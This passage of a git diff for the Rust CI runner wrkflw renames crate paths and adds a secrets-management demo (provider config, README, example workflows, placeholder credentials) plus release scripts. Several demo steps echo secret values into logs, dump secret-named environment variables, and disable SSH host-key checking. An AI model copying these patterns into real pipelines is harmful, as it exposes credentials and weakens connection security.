eprintln!("Error triggering GitLab pipeline: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
}
|
||||
Some(Commands::Tui {
|
||||
path,
|
||||
emulate,
|
||||
runtime,
|
||||
show_action_messages: _,
|
||||
preserve_containers_on_failure,
|
||||
}) => {
|
||||
// Set runtime type based on the emulate flag
|
||||
let runtime_type = if *emulate {
|
||||
executor::RuntimeType::Emulation
|
||||
} else {
|
||||
executor::RuntimeType::Docker
|
||||
};
|
||||
// Set runtime type based on the runtime choice
|
||||
let runtime_type = runtime.clone().into();
|
||||
|
||||
// Call the TUI implementation from the ui crate
|
||||
if let Err(e) = ui::run_wrkflw_tui(
|
||||
if let Err(e) = wrkflw_ui::run_wrkflw_tui(
|
||||
path.as_ref(),
|
||||
runtime_type,
|
||||
verbose,
|
||||
@@ -508,7 +560,9 @@ async fn main() {
|
||||
.map(|i| i.iter().cloned().collect::<HashMap<String, String>>());
|
||||
|
||||
// Trigger the workflow
|
||||
if let Err(e) = github::trigger_workflow(workflow, branch.as_deref(), inputs).await {
|
||||
if let Err(e) =
|
||||
wrkflw_github::trigger_workflow(workflow, branch.as_deref(), inputs).await
|
||||
{
|
||||
eprintln!("Error triggering GitHub workflow: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
@@ -518,10 +572,10 @@ async fn main() {
|
||||
}
|
||||
None => {
|
||||
// Launch TUI by default when no command is provided
|
||||
let runtime_type = executor::RuntimeType::Docker;
|
||||
let runtime_type = wrkflw_executor::RuntimeType::Docker;
|
||||
|
||||
// Call the TUI implementation from the ui crate with default path
|
||||
if let Err(e) = ui::run_wrkflw_tui(None, runtime_type, verbose, false).await {
|
||||
if let Err(e) = wrkflw_ui::run_wrkflw_tui(None, runtime_type, verbose, false).await {
|
||||
eprintln!("Error running TUI: {}", e);
|
||||
std::process::exit(1);
|
||||
}
|
||||
@@ -535,13 +589,13 @@ fn validate_github_workflow(path: &Path, verbose: bool) -> bool {
|
||||
print!("Validating GitHub workflow file: {}... ", path.display());
|
||||
|
||||
// Use the ui crate's validate_workflow function
|
||||
match ui::validate_workflow(path, verbose) {
|
||||
match wrkflw_ui::validate_workflow(path, verbose) {
|
||||
Ok(_) => {
|
||||
// The detailed validation output is already printed by the function
|
||||
// We need to check if there were validation issues
|
||||
// Since ui::validate_workflow doesn't return the validation result directly,
|
||||
// Since wrkflw_ui::validate_workflow doesn't return the validation result directly,
|
||||
// we need to call the evaluator directly to get the result
|
||||
match evaluator::evaluate_workflow_file(path, verbose) {
|
||||
match wrkflw_evaluator::evaluate_workflow_file(path, verbose) {
|
||||
Ok(result) => !result.is_valid,
|
||||
Err(_) => true, // Parse errors count as validation failure
|
||||
}
|
||||
@@ -559,12 +613,12 @@ fn validate_gitlab_pipeline(path: &Path, verbose: bool) -> bool {
|
||||
print!("Validating GitLab CI pipeline file: {}... ", path.display());
|
||||
|
||||
// Parse and validate the pipeline file
|
||||
match parser::gitlab::parse_pipeline(path) {
|
||||
match wrkflw_parser::gitlab::parse_pipeline(path) {
|
||||
Ok(pipeline) => {
|
||||
println!("✅ Valid syntax");
|
||||
|
||||
// Additional structural validation
|
||||
let validation_result = validators::validate_gitlab_pipeline(&pipeline);
|
||||
let validation_result = wrkflw_validators::validate_gitlab_pipeline(&pipeline);
|
||||
|
||||
if !validation_result.is_valid {
|
||||
println!("⚠️ Validation issues:");
|
||||
|
||||
65
examples/secrets-demo/.wrkflw/secrets.yml
Normal file
@@ -0,0 +1,65 @@
# wrkflw Secrets Configuration
# This file demonstrates various secret provider configurations

# Default provider to use when no provider is specified in ${{ secrets.name }}
default_provider: env

# Enable automatic masking of secrets in logs and output
enable_masking: true

# Timeout for secret operations (seconds)
timeout_seconds: 30

# Enable caching for performance
enable_caching: true

# Cache TTL in seconds
cache_ttl_seconds: 300

# Secret provider configurations
providers:
  # Environment variable provider
  env:
    type: environment
    # Optional prefix for environment variables
    # If specified, looks for WRKFLW_SECRET_* variables
    # prefix: "WRKFLW_SECRET_"

  # File-based secret storage
  file:
    type: file
    # Path to secrets file (supports JSON, YAML, or environment format)
    path: "~/.wrkflw/secrets.json"

  # HashiCorp Vault (requires vault-provider feature)
  vault:
    type: vault
    url: "https://vault.example.com"
    auth:
      method: token
      token: "${VAULT_TOKEN}"
    mount_path: "secret"

  # AWS Secrets Manager (requires aws-provider feature)
  aws:
    type: aws_secrets_manager
    region: "us-east-1"
    # Optional role to assume for cross-account access
    role_arn: "arn:aws:iam::123456789012:role/SecretRole"

  # Azure Key Vault (requires azure-provider feature)
  azure:
    type: azure_key_vault
    vault_url: "https://myvault.vault.azure.net/"
    auth:
      method: service_principal
      client_id: "${AZURE_CLIENT_ID}"
      client_secret: "${AZURE_CLIENT_SECRET}"
      tenant_id: "${AZURE_TENANT_ID}"

  # Google Cloud Secret Manager (requires gcp-provider feature)
  gcp:
    type: gcp_secret_manager
    project_id: "my-project-id"
    # Optional service account key file
    key_file: "/path/to/service-account.json"
505
examples/secrets-demo/README.md
Normal file
@@ -0,0 +1,505 @@
# wrkflw Secrets Management Demo

This demo walks through wrkflw's comprehensive secrets management system, which addresses the critical need for secure secret handling in CI/CD workflows.

## The Problem

Without proper secrets support, workflows are severely limited:

1. **No way to access sensitive data** - API keys, tokens, passwords, certificates
2. **Security risks** - Hardcoded secrets in code or plain text in logs
3. **Limited usefulness** - Can't integrate with real services that require authentication
4. **Compliance issues** - Unable to meet security standards for production workflows

## The Solution

wrkflw now provides comprehensive secrets management with:

- **Multiple secret providers** (environment variables, files, HashiCorp Vault, AWS Secrets Manager, etc.)
- **GitHub Actions-compatible syntax** (`${{ secrets.* }}`)
- **Automatic secret masking** in logs and output
- **Encrypted storage** for sensitive environments
- **Flexible configuration** for different deployment scenarios

## Quick Start

### 1. Environment Variables (Simplest)

```bash
# Set secrets as environment variables
export GITHUB_TOKEN="ghp_your_token_here"
export API_KEY="your_api_key"
export DB_PASSWORD="secure_password"
```

Create a workflow that uses secrets:

```yaml
# .github/workflows/secrets-demo.yml
name: Secrets Demo
on: [push]

jobs:
  test-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Use GitHub Token
        run: |
          echo "Using token to access GitHub API"
          curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
            https://api.github.com/user

      - name: Use API Key
        run: |
          echo "API Key: ${{ secrets.API_KEY }}"

      - name: Database Connection
        env:
          DB_PASS: ${{ secrets.DB_PASSWORD }}
        run: |
          echo "Connecting to database with password: ${DB_PASS}"
```

Run with wrkflw:

```bash
wrkflw run .github/workflows/secrets-demo.yml
```

### 2. File-based Secrets

Create a secrets file:

```json
{
  "API_KEY": "your_api_key_here",
  "DB_PASSWORD": "secure_database_password",
  "GITHUB_TOKEN": "ghp_your_github_token"
}
```

Or environment file format:

```bash
# secrets.env
API_KEY=your_api_key_here
DB_PASSWORD="secure database password"
GITHUB_TOKEN=ghp_your_github_token
```

Configure wrkflw to use file-based secrets:

```yaml
# ~/.wrkflw/secrets.yml
default_provider: file
enable_masking: true
timeout_seconds: 30

providers:
  file:
    type: file
    path: "./secrets.json" # or "./secrets.env"
```

### 3. Advanced Configuration

For production environments, use external secret managers:

```yaml
# ~/.wrkflw/secrets.yml
default_provider: vault
enable_masking: true
timeout_seconds: 30
enable_caching: true
cache_ttl_seconds: 300

providers:
  env:
    type: environment
    prefix: "WRKFLW_SECRET_"

  vault:
    type: vault
    url: "https://vault.company.com"
    auth:
      method: token
      token: "${VAULT_TOKEN}"
    mount_path: "secret"

  aws:
    type: aws_secrets_manager
    region: "us-east-1"
    role_arn: "arn:aws:iam::123456789012:role/SecretRole"
```

## Secret Providers

### Environment Variables

**Best for**: Development and simple deployments

```bash
# With prefix
export WRKFLW_SECRET_API_KEY="your_key"
export WRKFLW_SECRET_DB_PASSWORD="password"

# Direct environment variables
export GITHUB_TOKEN="ghp_token"
export API_KEY="key_value"
```

Use in workflows:
```yaml
steps:
  - name: Use prefixed secret
    run: echo "API: ${{ secrets.env:API_KEY }}"

  - name: Use direct secret
    run: echo "Token: ${{ secrets.GITHUB_TOKEN }}"
```

### File-based Storage

**Best for**: Local development and testing

Supports multiple formats:

**JSON** (`secrets.json`):
```json
{
  "GITHUB_TOKEN": "ghp_your_token",
  "API_KEY": "your_api_key",
  "DATABASE_URL": "postgresql://user:pass@localhost/db"
}
```

**YAML** (`secrets.yml`):
```yaml
GITHUB_TOKEN: ghp_your_token
API_KEY: your_api_key
DATABASE_URL: postgresql://user:pass@localhost/db
```

**Environment** (`secrets.env`):
```bash
GITHUB_TOKEN=ghp_your_token
API_KEY=your_api_key
DATABASE_URL="postgresql://user:pass@localhost/db"
```

### HashiCorp Vault

**Best for**: Production environments with centralized secret management

```yaml
providers:
  vault:
    type: vault
    url: "https://vault.company.com"
    auth:
      method: token
      token: "${VAULT_TOKEN}"
    mount_path: "secret/v2"
```

Use vault secrets in workflows:
```yaml
steps:
  - name: Use Vault secret
    run: curl -H "X-API-Key: ${{ secrets.vault:api-key }}" api.service.com
```

### AWS Secrets Manager

**Best for**: AWS-native deployments

```yaml
providers:
  aws:
    type: aws_secrets_manager
    region: "us-east-1"
    role_arn: "arn:aws:iam::123456789012:role/SecretRole"
```

### Azure Key Vault

**Best for**: Azure-native deployments

```yaml
providers:
  azure:
    type: azure_key_vault
    vault_url: "https://myvault.vault.azure.net/"
    auth:
      method: service_principal
      client_id: "${AZURE_CLIENT_ID}"
      client_secret: "${AZURE_CLIENT_SECRET}"
      tenant_id: "${AZURE_TENANT_ID}"
```

## Secret Masking

wrkflw automatically masks secrets in logs to prevent accidental exposure:

```bash
# Original log:
# "API response: {\"token\": \"ghp_1234567890abcdef\", \"status\": \"ok\"}"

# Masked log:
# "API response: {\"token\": \"ghp_***\", \"status\": \"ok\"}"
```

Automatically detects and masks (see the sketch after this list):

- GitHub Personal Access Tokens (`ghp_*`)
- GitHub App tokens (`ghs_*`)
- GitHub OAuth tokens (`gho_*`)
- AWS Access Keys (`AKIA*`)
- JWT tokens
- Generic API keys
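wrkflw's actual masking implementation is internal; as a rough illustration of what pattern-based masking does, here is a minimal `sed` sketch over the token shapes listed above. The `mask` helper and its regexes are illustrative assumptions, not wrkflw code:

```bash
# Hypothetical stand-in for a masking pass (illustration only, not wrkflw's code)
mask() {
  sed -E \
    -e 's/gh[pso]_[A-Za-z0-9]+/gh*_***/g' \
    -e 's/AKIA[0-9A-Z]{16}/AKIA***/g'
}

echo 'token=ghp_1234567890abcdef key=AKIAIOSFODNN7EXAMPLE' | mask
# -> token=gh*_*** key=AKIA***
```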

## Workflow Examples

### GitHub API Integration

```yaml
name: GitHub API Demo
on: [push]

jobs:
  github-integration:
    runs-on: ubuntu-latest
    steps:
      - name: List repositories
        run: |
          curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
            -H "Accept: application/vnd.github.v3+json" \
            https://api.github.com/user/repos

      - name: Create issue
        run: |
          curl -X POST \
            -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
            -H "Accept: application/vnd.github.v3+json" \
            https://api.github.com/repos/owner/repo/issues \
            -d '{"title":"Automated issue","body":"Created by wrkflw"}'
```

### Database Operations

```yaml
name: Database Demo
on: [push]

jobs:
  database-ops:
    runs-on: ubuntu-latest
    steps:
      - name: Run migrations
        env:
          DATABASE_URL: ${{ secrets.DATABASE_URL }}
          DB_PASSWORD: ${{ secrets.DB_PASSWORD }}
        run: |
          echo "Running database migrations..."
          # Your migration commands here

      - name: Backup database
        run: |
          pg_dump "${{ secrets.DATABASE_URL }}" > backup.sql
```

### Multi-Provider Example

```yaml
name: Multi-Provider Demo
on: [push]

jobs:
  multi-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Use environment secret
        run: echo "Env: ${{ secrets.env:API_KEY }}"

      - name: Use file secret
        run: echo "File: ${{ secrets.file:GITHUB_TOKEN }}"

      - name: Use Vault secret
        run: echo "Vault: ${{ secrets.vault:database-password }}"

      - name: Use AWS secret
        run: echo "AWS: ${{ secrets.aws:prod/api/key }}"
```

## Security Best Practices

### 1. Use Appropriate Providers

- **Development**: Environment variables or files
- **Staging**: File-based or simple vault
- **Production**: External secret managers (Vault, AWS, Azure, GCP)

### 2. Enable Secret Masking

Always enable masking in production:

```yaml
enable_masking: true
```

### 3. Rotate Secrets Regularly

Use secret managers that support automatic rotation:

```yaml
providers:
  aws:
    type: aws_secrets_manager
    region: "us-east-1"
    # AWS Secrets Manager handles automatic rotation
```

### 4. Use Least Privilege

Grant minimal necessary permissions:

```yaml
providers:
  vault:
    type: vault
    auth:
      method: app_role
      role_id: "${VAULT_ROLE_ID}"
      secret_id: "${VAULT_SECRET_ID}"
    # Role has access only to required secrets
```

### 5. Monitor Secret Access

Use secret managers with audit logging:

```yaml
providers:
  azure:
    type: azure_key_vault
    vault_url: "https://myvault.vault.azure.net/"
    # Azure Key Vault provides detailed audit logs
```

## Troubleshooting

### Secret Not Found

```bash
Error: Secret 'API_KEY' not found

# Check:
1. Secret exists in the provider
2. Provider is correctly configured
3. Authentication is working
4. Correct provider name in ${{ secrets.provider:name }}
```
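If the failing lookup targets the environment provider, a quick shell check rules out the most common cause. The names below are placeholders for your own secret names:

```bash
# Check both the bare variable and the optional WRKFLW_SECRET_ prefix form
for name in API_KEY WRKFLW_SECRET_API_KEY; do
  if [ -n "${!name}" ]; then echo "$name is set"; else echo "$name is NOT set"; fi
done
```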

### Authentication Failed

```bash
Error: Authentication failed for provider 'vault'

# Check:
1. Credentials are correct
2. Network connectivity to secret manager
3. Permissions for the service account
4. Token/credential expiration
```

### Secret Masking Not Working

```bash
# Secrets appearing in logs

# Check:
1. enable_masking: true in configuration
2. Secret is properly retrieved (not hardcoded)
3. Secret matches known patterns for auto-masking
```

## Migration Guide

### From GitHub Actions

Most GitHub Actions workflows work without changes:

```yaml
# This works directly in wrkflw
steps:
  - name: Deploy
    env:
      API_TOKEN: ${{ secrets.API_TOKEN }}
    run: deploy.sh
```

### From Environment Variables

```bash
# Before (environment variables)
export API_KEY="your_key"
./script.sh

# After (wrkflw secrets)
# Set in secrets.env:
#   API_KEY=your_key

# Use in workflow:
#   ${{ secrets.API_KEY }}
```

### From CI/CD Platforms

Most secrets can be migrated by (a sketch of step 2 follows the list):

1. Exporting from current platform
2. Importing into wrkflw's chosen provider
3. Updating workflow syntax to `${{ secrets.NAME }}`

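For step 2 with the file provider, a small shell loop can capture secrets that already exist as exported environment variables into a `secrets.env` file. This is a sketch; the variable names are examples, so substitute your own list:

```bash
# Write selected exported variables into a secrets.env file (sketch)
for name in API_KEY DB_PASSWORD GITHUB_TOKEN; do
  printf '%s=%s\n' "$name" "${!name}"
done > secrets.env
chmod 600 secrets.env   # keep the file readable only by you
```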

## Performance Considerations

### Caching

Enable caching for frequently accessed secrets:

```yaml
enable_caching: true
cache_ttl_seconds: 300 # 5 minutes
```

### Connection Pooling

For high-volume deployments, most secret-manager clients handle connection pooling themselves:

```yaml
providers:
  vault:
    type: vault
    # Vault client automatically handles connection pooling
```

### Timeout Configuration

Adjust timeouts based on network conditions:

```yaml
timeout_seconds: 30 # Increase for slow networks
```

## Conclusion

With comprehensive secrets management, wrkflw is now suitable for production workflows requiring secure access to:

- External APIs and services
- Databases and storage systems
- Cloud provider resources
- Authentication systems
- Deployment targets

The flexible provider system ensures compatibility with existing secret management infrastructure while providing a GitHub Actions-compatible developer experience.

**The usefulness limitation has been removed** - wrkflw can now handle real-world CI/CD scenarios securely and efficiently.
49
examples/secrets-demo/env.example
Normal file
@@ -0,0 +1,49 @@
# Example environment variables for wrkflw secrets demo
# Copy this file to .env and fill in your actual values

# GitHub integration
GITHUB_TOKEN=ghp_your_github_personal_access_token

# Generic API credentials
API_KEY=your_api_key_here
API_ENDPOINT=https://api.example.com/v1

# Database credentials
DB_USER=your_db_username
DB_PASSWORD=your_secure_db_password
DATABASE_URL=postgresql://user:password@localhost:5432/dbname
MONGO_CONNECTION_STRING=mongodb://user:password@localhost:27017/dbname

# Docker registry credentials
DOCKER_USERNAME=your_docker_username
DOCKER_PASSWORD=your_docker_password

# AWS credentials
AWS_ACCESS_KEY_ID=your_aws_access_key_id
AWS_SECRET_ACCESS_KEY=your_aws_secret_access_key
S3_BUCKET_NAME=your-s3-bucket-name

# Deployment credentials
STAGING_DEPLOY_KEY=your_base64_encoded_ssh_private_key
STAGING_HOST=staging.yourdomain.com

# Notification webhooks
WEBHOOK_URL=https://your.webhook.endpoint/path
SLACK_WEBHOOK=https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK

# Demo and testing secrets
DEMO_SECRET=this_will_be_masked_in_logs
REQUIRED_SECRET=required_for_validation_tests

# Prefixed secrets (if using WRKFLW_SECRET_ prefix)
WRKFLW_SECRET_PREFIXED_KEY=prefixed_secret_value

# Vault credentials (if using HashiCorp Vault)
VAULT_TOKEN=your_vault_token
VAULT_ROLE_ID=your_vault_role_id
VAULT_SECRET_ID=your_vault_secret_id

# Azure credentials (if using Azure Key Vault)
AZURE_CLIENT_ID=your_azure_client_id
AZURE_CLIENT_SECRET=your_azure_client_secret
AZURE_TENANT_ID=your_azure_tenant_id
213
examples/secrets-demo/secrets-workflow.yml
Normal file
@@ -0,0 +1,213 @@
name: Comprehensive Secrets Demo
on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

jobs:
  # Basic environment variable secrets
  env-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Use GitHub Token
        run: |
          echo "Fetching user info from GitHub API"
          curl -s -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
            https://api.github.com/user | jq '.login'

      - name: Use API Key
        env:
          API_KEY: ${{ secrets.API_KEY }}
        run: |
          echo "API Key length: ${#API_KEY}"
          # Key will be masked in logs automatically

      - name: Database connection
        run: |
          echo "Connecting to database with credentials"
          echo "User: ${{ secrets.DB_USER }}"
          echo "Password: [MASKED]"
          # Password would be: ${{ secrets.DB_PASSWORD }}

  # Provider-specific secrets
  provider-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Use file-based secrets
        run: |
          echo "File secret: ${{ secrets.file:FILE_SECRET }}"

      - name: Use environment with prefix
        run: |
          echo "Prefixed secret: ${{ secrets.env:PREFIXED_KEY }}"

      - name: Use Vault secret (if configured)
        run: |
          # This would work if Vault provider is configured
          echo "Vault secret: ${{ secrets.vault:api-key }}"

      - name: Use AWS Secrets Manager (if configured)
        run: |
          # This would work if AWS provider is configured
          echo "AWS secret: ${{ secrets.aws:prod/database/password }}"

  # Real-world integration examples
  github-integration:
    runs-on: ubuntu-latest
    steps:
      - name: Create GitHub issue
        run: |
          curl -X POST \
            -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
            -H "Accept: application/vnd.github.v3+json" \
            -H "Content-Type: application/json" \
            https://api.github.com/repos/${{ github.repository }}/issues \
            -d '{
              "title": "Automated issue from wrkflw",
              "body": "This issue was created automatically by wrkflw secrets demo",
              "labels": ["automation", "demo"]
            }'

      - name: List repository secrets (admin only)
        run: |
          # This would require admin permissions
          curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" \
            https://api.github.com/repos/${{ github.repository }}/actions/secrets

  # Docker registry integration
  docker-integration:
    runs-on: ubuntu-latest
    steps:
      - name: Login to Docker Hub
        env:
          DOCKER_USERNAME: ${{ secrets.DOCKER_USERNAME }}
          DOCKER_PASSWORD: ${{ secrets.DOCKER_PASSWORD }}
        run: |
          echo "Logging into Docker Hub"
          echo "$DOCKER_PASSWORD" | docker login -u "$DOCKER_USERNAME" --password-stdin

      - name: Pull private image
        run: |
          docker pull private-registry.com/myapp:latest

      - name: Push image
        run: |
          docker tag myapp:latest "${{ secrets.DOCKER_USERNAME }}/myapp:${{ github.sha }}"
          docker push "${{ secrets.DOCKER_USERNAME }}/myapp:${{ github.sha }}"

  # Cloud provider integration
  aws-integration:
    runs-on: ubuntu-latest
    steps:
      - name: Configure AWS credentials
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          AWS_DEFAULT_REGION: us-east-1
        run: |
          echo "Configuring AWS CLI"
          aws configure set aws_access_key_id "$AWS_ACCESS_KEY_ID"
          aws configure set aws_secret_access_key "$AWS_SECRET_ACCESS_KEY"
          aws configure set default.region "$AWS_DEFAULT_REGION"

      - name: List S3 buckets
        run: |
          aws s3 ls

      - name: Deploy to S3
        run: |
          echo "Deploying to S3 bucket"
          aws s3 sync ./build/ s3://${{ secrets.S3_BUCKET_NAME }}/

  # Database operations
  database-operations:
    runs-on: ubuntu-latest
    steps:
      - name: PostgreSQL operations
        env:
          DATABASE_URL: ${{ secrets.DATABASE_URL }}
          PGPASSWORD: ${{ secrets.DB_PASSWORD }}
        run: |
          echo "Connecting to PostgreSQL database"
          psql "$DATABASE_URL" -c "SELECT version();"

      - name: MongoDB operations
        env:
          MONGO_CONNECTION_STRING: ${{ secrets.MONGO_CONNECTION_STRING }}
        run: |
          echo "Connecting to MongoDB"
          mongosh "$MONGO_CONNECTION_STRING" --eval "db.stats()"

  # API testing with secrets
  api-testing:
    runs-on: ubuntu-latest
    steps:
      - name: Test external API
        env:
          API_ENDPOINT: ${{ secrets.API_ENDPOINT }}
          API_KEY: ${{ secrets.API_KEY }}
        run: |
          echo "Testing API endpoint"
          curl -X GET \
            -H "Authorization: Bearer $API_KEY" \
            -H "Content-Type: application/json" \
            "$API_ENDPOINT/health"

      - name: Test webhook
        run: |
          curl -X POST \
            -H "Content-Type: application/json" \
            -d '{"event": "test", "source": "wrkflw"}' \
            "${{ secrets.WEBHOOK_URL }}"

  # Deployment with secrets
  deployment:
    runs-on: ubuntu-latest
    needs: [env-secrets, api-testing]
    if: github.ref == 'refs/heads/main'
    steps:
      - name: Deploy to staging
        env:
          DEPLOY_KEY: ${{ secrets.STAGING_DEPLOY_KEY }}
          STAGING_HOST: ${{ secrets.STAGING_HOST }}
        run: |
          echo "Deploying to staging environment"
          echo "$DEPLOY_KEY" | base64 -d > deploy_key
          chmod 600 deploy_key
          ssh -i deploy_key -o StrictHostKeyChecking=no \
            deploy@"$STAGING_HOST" 'cd /app && git pull && ./deploy.sh'

      - name: Notify deployment
        env:
          SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK }}
        run: |
          curl -X POST -H 'Content-type: application/json' \
            --data '{"text":"Deployment completed successfully"}' \
            "$SLACK_WEBHOOK"

  # Security testing
  security-demo:
    runs-on: ubuntu-latest
    steps:
      - name: Demonstrate secret masking
        run: |
          echo "This secret will be masked: ${{ secrets.DEMO_SECRET }}"
          echo "Even in complex strings: prefix_${{ secrets.DEMO_SECRET }}_suffix"

      - name: Show environment (secrets masked)
        run: |
          env | grep -E "(SECRET|TOKEN|PASSWORD|KEY)" || echo "No secrets visible in environment"

      - name: Test secret validation
        run: |
          # This would fail if secret doesn't exist
          if [ -z "${{ secrets.REQUIRED_SECRET }}" ]; then
            echo "ERROR: Required secret is missing"
            exit 1
          else
            echo "Required secret is present"
          fi
21
examples/secrets-demo/secrets.json.example
Normal file
@@ -0,0 +1,21 @@
{
  "GITHUB_TOKEN": "ghp_example_token_replace_with_real_token",
  "API_KEY": "demo_api_key_12345",
  "DB_PASSWORD": "secure_database_password",
  "DB_USER": "application_user",
  "DOCKER_USERNAME": "your_docker_username",
  "DOCKER_PASSWORD": "your_docker_password",
  "AWS_ACCESS_KEY_ID": "AKIAIOSFODNN7EXAMPLE",
  "AWS_SECRET_ACCESS_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "S3_BUCKET_NAME": "my-deployment-bucket",
  "DATABASE_URL": "postgresql://user:password@localhost:5432/mydb",
  "MONGO_CONNECTION_STRING": "mongodb://user:password@localhost:27017/mydb",
  "API_ENDPOINT": "https://api.example.com/v1",
  "WEBHOOK_URL": "https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX",
  "STAGING_DEPLOY_KEY": "base64_encoded_ssh_private_key",
  "STAGING_HOST": "staging.example.com",
  "SLACK_WEBHOOK": "https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX",
  "DEMO_SECRET": "this_will_be_masked_in_logs",
  "REQUIRED_SECRET": "required_for_validation",
  "FILE_SECRET": "stored_in_file_provider"
}
13
final-test.yml
Normal file
@@ -0,0 +1,13 @@
name: Final Secrets Test
on: [push]

jobs:
  verify-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Test secrets are working
        env:
          SECRET_VAL: ${{ secrets.TEST_SECRET }}
        run: |
          echo "Secret length: ${#SECRET_VAL}"
          echo "All secrets functionality verified!"
179
publish_crates.sh
Executable file
@@ -0,0 +1,179 @@
#!/bin/bash

# Enhanced script to manage versions and publish all wrkflw crates using cargo-workspaces

set -e

# Parse command line arguments
COMMAND=${1:-""}
VERSION_TYPE=${2:-""}
DRY_RUN=""

show_help() {
    echo "Usage: $0 <command> [options]"
    echo ""
    echo "Commands:"
    echo "  version <type>    Update versions across workspace"
    echo "                    Types: patch, minor, major"
    echo "  publish           Publish all crates to crates.io"
    echo "  release <type>    Update versions and publish (combines version + publish)"
    echo "  help              Show this help message"
    echo ""
    echo "Options:"
    echo "  --dry-run         Test without making changes (for publish/release)"
    echo ""
    echo "Examples:"
    echo "  $0 version minor            # Bump to 0.7.0"
    echo "  $0 publish --dry-run        # Test publishing"
    echo "  $0 release minor --dry-run  # Test version bump + publish"
    echo "  $0 release patch            # Release patch version"
}

# Parse dry-run flag from any position
for arg in "$@"; do
    if [[ "$arg" == "--dry-run" ]]; then
        DRY_RUN="--dry-run"
    fi
done

case "$COMMAND" in
    "help"|"-h"|"--help"|"")
        show_help
        exit 0
        ;;
    "version")
        if [[ -z "$VERSION_TYPE" ]]; then
            echo "❌ Error: Version type required (patch, minor, major)"
            echo ""
            show_help
            exit 1
        fi
        ;;
    "publish")
        # publish command doesn't need version type
        ;;
    "release")
        if [[ -z "$VERSION_TYPE" ]]; then
            echo "❌ Error: Version type required for release (patch, minor, major)"
            echo ""
            show_help
            exit 1
        fi
        ;;
    *)
        echo "❌ Error: Unknown command '$COMMAND'"
        echo ""
        show_help
        exit 1
        ;;
esac

# Check if cargo-workspaces is installed
if ! command -v cargo-workspaces &> /dev/null; then
    echo "❌ cargo-workspaces not found. Installing..."
    cargo install cargo-workspaces
fi

# Check if we're logged in to crates.io (only for publish operations)
if [[ "$COMMAND" == "publish" ]] || [[ "$COMMAND" == "release" ]]; then
    if [ ! -f ~/.cargo/credentials.toml ] && [ ! -f ~/.cargo/credentials ]; then
        echo "❌ Not logged in to crates.io. Please run: cargo login <your-token>"
        exit 1
    fi
fi

# Function to update versions
update_versions() {
    local version_type=$1
    echo "🔄 Updating workspace versions ($version_type)..."

    if [[ "$DRY_RUN" == "--dry-run" ]]; then
        echo "🧪 DRY RUN: Simulating version update"
        echo ""
        echo "Current workspace version: $(grep '^version =' Cargo.toml | cut -d'"' -f2)"
        echo "Would execute: cargo workspaces version $version_type"
        echo ""
        echo "This would update all crates and their internal dependencies."
        echo "✅ Version update simulation completed (no changes made)"
    else
        cargo workspaces version "$version_type"
        echo "✅ Versions updated successfully"
    fi
}

# Function to test build
test_build() {
    echo "🔨 Testing workspace build..."
    if cargo build --workspace; then
        echo "✅ Workspace builds successfully"
    else
        echo "❌ Build failed. Please fix errors before publishing."
        exit 1
    fi
}

# Function to publish crates
publish_crates() {
    echo "📦 Publishing crates to crates.io..."

    if [[ "$DRY_RUN" == "--dry-run" ]]; then
        echo "🧪 DRY RUN: Testing publication"
        cargo workspaces publish --dry-run
        echo "✅ All crates passed dry-run tests!"
        echo ""
        echo "To actually publish, run:"
        echo "  $0 publish"
    else
        cargo workspaces publish
        echo "🎉 All crates published successfully!"
        echo ""
        echo "Users can now install wrkflw with:"
        echo "  cargo install wrkflw"
    fi
}

# Function to show changelog info
show_changelog_info() {
    echo "📝 Changelog will be generated automatically by GitHub Actions workflow"
}

# Execute commands based on the operation
case "$COMMAND" in
    "version")
        update_versions "$VERSION_TYPE"
        show_changelog_info
        ;;
    "publish")
        test_build
        publish_crates
        ;;
    "release")
        echo "🚀 Starting release process..."
        echo ""

        # Step 1: Update versions
        update_versions "$VERSION_TYPE"

        # Step 2: Test build
        test_build

        # Step 3: Show changelog info
        show_changelog_info

        # Step 4: Publish (if not dry-run)
        if [[ "$DRY_RUN" != "--dry-run" ]]; then
            echo ""
            read -p "🤔 Continue with publishing? (y/N): " -n 1 -r
            echo
            if [[ $REPLY =~ ^[Yy]$ ]]; then
                publish_crates
            else
                echo "⏸️ Publishing cancelled. To publish later, run:"
                echo "  $0 publish"
            fi
        else
            echo ""
            publish_crates
        fi
        ;;
esac
97
scripts/bump-crate.sh
Executable file
@@ -0,0 +1,97 @@
#!/bin/bash

# Script to bump individual crate versions and update workspace dependencies
# Usage: ./scripts/bump-crate.sh <crate-name> <version-type>
# Example: ./scripts/bump-crate.sh wrkflw-models patch
# Example: ./scripts/bump-crate.sh wrkflw-models 0.7.5

set -e

CRATE_NAME="$1"
VERSION_TYPE="$2"

if [[ -z "$CRATE_NAME" || -z "$VERSION_TYPE" ]]; then
    echo "Usage: $0 <crate-name> <version-type>"
    echo "  crate-name:   Name of the crate to bump (e.g., wrkflw-models)"
    echo "  version-type: patch|minor|major or specific version (e.g., 0.7.5)"
    echo ""
    echo "Available crates:"
    ls crates/ | grep -v README.md
    exit 1
fi

CRATE_DIR="crates/${CRATE_NAME#wrkflw-}"
if [[ ! -d "$CRATE_DIR" ]]; then
    echo "Error: Crate directory '$CRATE_DIR' not found"
    echo "Available crates:"
